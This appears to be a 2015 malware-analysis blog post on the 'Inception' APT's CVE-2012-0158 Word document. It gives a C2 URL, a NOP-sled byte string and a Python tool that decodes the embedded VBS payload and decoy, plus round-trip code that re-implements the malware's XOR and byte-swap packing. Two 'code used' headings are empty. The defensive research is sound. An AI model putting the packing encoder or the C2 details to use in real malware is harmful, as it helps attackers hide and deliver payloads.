
w@rri0r@bh@y

APT Inception

Greet: "Vinnu", "nightrover", "bond"

In December 2014 Blue Coat released a report on an APT campaign named "Inception". The spear-phishing mail was sent with an attachment under various names; we analysed the attachment named "Car for sale.doc". The attachment was an exploit for CVE-2012-0158 with an embedded VBS and a decoy file themed as an advertisement for a used car, purportedly sent by Michael Hahne, an employee at the German Embassy.
Our main motive for writing this blog was to automate extraction of the payload and decoy file used in APT Inception, so that researchers can save the time it takes to extract payloads manually and possibly catch new variants of the malware.
Decoy File
------------
[Image: 1.JPG (the decoy document)]

Payload
---------
VBE file -> VBS file -> DLL file -> C2

C2 Info
--------
Code:
http://webdav.cloudme.com/chloe7400/CloudDrive/
The sample we used triggers the vulnerability on both MS Office 2007 and MS Office 2010.
The following is the code the attackers used:
The attackers also used the following byte sequence in place of a NOP sled:
Code:
4B4B414A4748434F4742434A434B42414149434F42414E4F494A4142434F484F434A4B4848434343484A4E41424A4E43464B424842484848474746424A4742424F4B464B4F434B4A4F464848484641434A4E4E4E484F48474241424E484B484748484848
We used the following sample to build the extraction code:
MD5: 4624da84cae0f8b689169e24be8f7410
Exploit: CVE-2012-0158

The shellcode used in this sample was:
After analysing the sample we wrote the following Python extractor, which pulls the malware (VBS) and the decoy document out of the exploit document used in this campaign:

Code:
import os
import shutil
import binascii

# Working directories, relative to where the script is run:
#   scan\   - exploit documents to process
#   comp\   - samples from which payload and decoy were extracted
#   nocomp\ - samples that did not match the Inception layout
#   output\ - extracted .vbs and .doc files
base = os.getcwd()
scan = os.path.join(base, "scan")
processed_file = os.path.join(base, "comp")
nocomp = os.path.join(base, "nocomp")
output = os.path.join(base, "output")

for d in (scan, processed_file, nocomp, output):
    os.makedirs(d, exist_ok=True)

samples = os.listdir(scan)


def mov_nocomp(sample):
    """Move a sample that did not match into nocomp\\."""
    try:
        shutil.move(os.path.join(scan, sample), os.path.join(nocomp, sample))
    except OSError:
        pass


def mov_processed_file(sample):
    """Move a successfully processed sample into comp\\."""
    try:
        shutil.move(os.path.join(scan, sample), os.path.join(processed_file, sample))
    except OSError:
        pass


def decryption(file_size, file_decrypt):
    """Decode the embedded payload: byte i is XORed with i % 0x100.

    The first loop walks the buffer backwards (index 0 is never used), so the
    result comes out reversed; the second loop restores the original order and
    drops the final byte, as the original extractor does.
    """
    comp = bytearray()
    a = file_size - 1
    for i in range(file_size - 1, 0, -1):
        xor_key = a % 0x100
        comp.append(file_decrypt[i] ^ xor_key)
        a = a - 1
    comp1 = bytearray()
    a1 = len(comp) - 1
    for i in range(0, len(comp) - 1, 1):
        comp1.append(comp[a1])
        a1 = a1 - 1
    return bytes(comp1)


def vbs_swap(data):
    """The first 0x200 bytes of the VBS are stored with every byte pair swapped;
    swap them back and append the rest of the script unchanged."""
    compl = bytearray()
    a = 0
    b = 1
    for i in range(0, 0x200, 2):
        compl += bytes([data[b], data[a]])
        a = a + 2
        b = b + 2
    return bytes(compl) + data[0x200:]


for sample in samples:
    with open(os.path.join(scan, sample), "rb") as f:
        fl = f.read()

    # Only RTF documents ({\rtf1 ...) are candidates for this exploit
    if fl[:4] != b"{\\rt":
        mov_nocomp(sample)
        continue

    # "VPdPD" marks where the encoded payload starts inside the RTF
    found = fl.find(b"VPdPD")
    print("Processing_APT_Inception_" + sample)
    if found > -1:
        file_decrypt = fl[found + 0x1d:]
        file_size = len(file_decrypt)
        comp = decryption(file_size, file_decrypt)
        data = binascii.unhexlify("D0CF11")  # start of the OLE2 header of the decoy .doc
        doc_file = comp.find(data)
        if doc_file < 0:
            # Decoded blob has no OLE2 header: not the layout we know
            mov_nocomp(sample)
            continue
        vbs_file = comp[8:doc_file]  # 8-byte header, then the VBS up to the decoy
        vbs_data = vbs_swap(vbs_file)
        doc_file1 = comp[doc_file:]
        with open(os.path.join(output, sample + ".vbs"), "wb") as vbs_ex:
            vbs_ex.write(vbs_data)
        with open(os.path.join(output, sample + ".doc"), "wb") as doc_ex:
            doc_ex.write(doc_file1)
        mov_processed_file(sample)
    else:
        mov_nocomp(sample)
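As an added check of the extractor's transforms (example code written for this post, not the original script), the following builds a constructed buffer laid out the way the extractor expects it (RTF header, "VPdPD" marker, payload at 0x1d from the marker, 8-byte header, byte-pair-swapped VBS, then the OLE2 decoy), encodes it with the inverse of the script's decryption() and vbs_swap(), and recovers both parts. The filler bytes, the 8-byte header content and the discarded leading and trailing bytes are assumptions, not fields observed in the real sample.

```python
import binascii

MARKER = b"VPdPD"                           # marker the extractor searches for
PAYLOAD_OFFSET = 0x1d                       # extractor decodes fl[found + 0x1d:]
OLE_MAGIC = binascii.unhexlify("D0CF11")    # start of the decoy .doc

def decode_payload(buf):
    """Extractor's decryption(): XOR byte i with i % 0x100, keep indices 1..len-2."""
    return bytes(buf[i] ^ (i % 0x100) for i in range(1, len(buf) - 1))

def swap_pairs(data):
    """Extractor's vbs_swap(): exchange each byte pair in the first 0x200 bytes.
    Applying it twice is the identity, so the same function also encodes."""
    head = bytearray()
    for i in range(0, 0x200, 2):
        head += bytes([data[i + 1], data[i]])
    return bytes(head) + data[0x200:]

def encode_payload(vbs, doc):
    """Inverse of decode_payload(). Assumed (constructed) layout: one leading and
    one trailing byte that the extractor discards, and an 8-byte header of 'H'."""
    plain = b"\x00" + b"H" * 8 + swap_pairs(vbs) + doc + b"\x00"
    return bytes(plain[i] ^ (i % 0x100) for i in range(len(plain)))

def build_rtf(vbs, doc):
    """Constructed stand-in for the exploit document: RTF header, marker,
    filler up to the 0x1d offset, then the encoded payload."""
    filler = b"A" * (PAYLOAD_OFFSET - len(MARKER))
    return b"{\\rtf1 constructed sample " + MARKER + filler + encode_payload(vbs, doc)

def extract(rtf):
    """The page's extraction steps on one buffer; returns (vbs, doc) or None."""
    if rtf[:4] != b"{\\rt":
        return None
    found = rtf.find(MARKER)
    if found < 0:
        return None
    comp = decode_payload(rtf[found + PAYLOAD_OFFSET:])
    doc_at = comp.find(OLE_MAGIC)
    if doc_at < 0:
        return None
    return swap_pairs(comp[8:doc_at]), comp[doc_at:]

# Constructed inputs: a VBS stand-in longer than 0x200 bytes and an OLE2-headed decoy
VBS = b"' constructed VBS stand-in line\r\n" * 30
DOC = binascii.unhexlify("D0CF11E0A1B11AE1") + b" constructed decoy body"

def roundtrip_ok():
    return extract(build_rtf(VBS, DOC)) == (VBS, DOC)
```

Feeding a real sample's bytes to extract() instead of build_rtf() gives the same (vbs, doc) pair the script writes to output\.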

Updated 03-23-2015 at 05:59 PM by 41.w4r10r
